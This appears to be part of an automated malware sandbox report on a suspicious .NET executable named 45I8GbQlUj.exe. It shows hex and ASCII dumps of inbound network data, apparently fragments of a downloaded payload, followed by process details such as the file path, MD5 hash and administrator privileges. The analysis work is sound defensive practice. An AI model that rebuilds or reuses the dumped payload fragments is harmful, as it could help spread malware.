                Jan 15, 2022 01:14:06.379996061 CET1017INData Raw: 13 00 13 08 02 20 07 00 13 08 02 65 11 15 07 08 08 02 07 04 00 13 01 cc 80 12 15 07 c4 80 11 01 07 05 e9 80 12 01 07 05 09 82 12 ed 81 11 01 02 20 09 02 19 83 12 19 83 12 1d 19 83 12 0e 01 05 20 0f 0e d9 81 12 19 83 12 09 82 12 05 82 12 09 82 12
                Data Ascii: e U-U eeeU=ee
                Jan 15, 2022 01:14:06.380064011 CET1018INData Raw: 8d 80 12 01 20 08 19 83 12 1d 09 82 12 ed 81 11 01 03 20 0d d9 81 12 ed 81 11 01 02 20 09 e5 81 11 00 20 05 e9 81 12 ed 81 11 01 02 20 09 19 83 12 e9 81 12 01 20 08 e1 81 12 00 20 05 02 0d 82 12 19 83 12 1d 19 83 12 0e 01 05 20 0f e9 81 12 19 83
                Data Ascii: &```$
                Jan 15, 2022 01:14:06.380125999 CET1020INData Raw: 82 12 a5 81 12 1c 1d 19 83 12 08 06 07 14 08 05 1d 08 0a 94 82 12 94 82 12 06 07 0d ec 81 12 1d 04 1c 0a 01 00 04 09 ec 81 12 1d 09 08 94 82 12 05 07 0c 0d 08 94 82 12 03 07 07 09 01 07 03 1c 1d 02 1c 08 02 55 12 15 06 1c 05 82 12 02 55 12 15 08
                Data Ascii: UUUU qq =$$==e=Y=
                Jan 15, 2022 01:14:06.380198956 CET1021INData Raw: 04 9c 83 12 06 04 1c 31 12 08 e5 80 12 03 20 09 70 83 12 e9 82 12 e9 82 12 e9 82 12 08 01 05 20 10 70 83 12 01 01 20 06 e9 82 12 06 04 70 83 12 06 04 08 08 18 02 00 05 08 18 18 02 00 05 08 02 01 00 04 e4 82 11 01 01 00 06 0b 05 1d 1c 1d 05 1d 03
                Data Ascii: 1 p p pdH 848P*4
                Jan 15, 2022 01:14:06.380259037 CET1023INData Raw: 06 04 0e 02 01 00 04 09 81 12 00 00 05 09 81 12 06 04 e4 81 12 e4 81 12 02 02 00 09 e4 81 12 02 01 20 06 e4 81 12 00 00 05 03 01 01 20 04 03 00 20 03 03 06 02 00 13 01 1c 12 15 00 20 08 08 08 05 1d 05 1d 03 20 08 08 05 1d 08 08 05 1d 08 05 20 0a
                Data Ascii: ` ` ` ( (
                Jan 15, 2022 01:14:06.380323887 CET1024INData Raw: 82 12 05 82 12 02 55 12 15 06 0b e5 80 12 02 13 01 20 07 01 13 00 13 02 13 02 20 08 05 13 04 13 03 13 02 13 01 13 00 13 01 06 20 0f e5 80 12 08 13 01 20 07 07 13 06 13 05 13 04 13 03 13 02 13 01 13 00 13 08 13 08 20 14 e5 80 12 01 13 01 20 07 00
                Data Ascii: U 1
                Jan 15, 2022 01:14:06.480017900 CET1025INData Raw: 04 00 0d 0e 0e d1 80 12 02 00 07 02 02 01 02 20 05 94 82 12 94 82 12 02 02 00 09 1c 1d 1c 10 1c 05 82 12 02 04 20 0b 4c 12 44 12 01 00 06 19 83 12 1c 01 00 06 94 82 12 4c 12 01 02 00 08 58 81 12 01 01 20 06 0d 82 12 58 81 12 01 02 20 09 18 81 12
                Data Ascii: LDLX X qUUUTUqqUX<!, , D D


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                Analysis Process: 45I8GbQlUj.exe PID: 6100 Parent PID: 5936

                General

                Start time:01:14:04
                Start date:15/01/2022
                Path:C:\Users\user\Desktop\45I8GbQlUj.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\45I8GbQlUj.exe"
                Imagebase:0x450000
                File size:54272 bytes
                MD5 hash:1B1E4286625BB189A526E910F2031C7B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Chronological Activities

                Disassembly

                Code Analysis

                Reset < >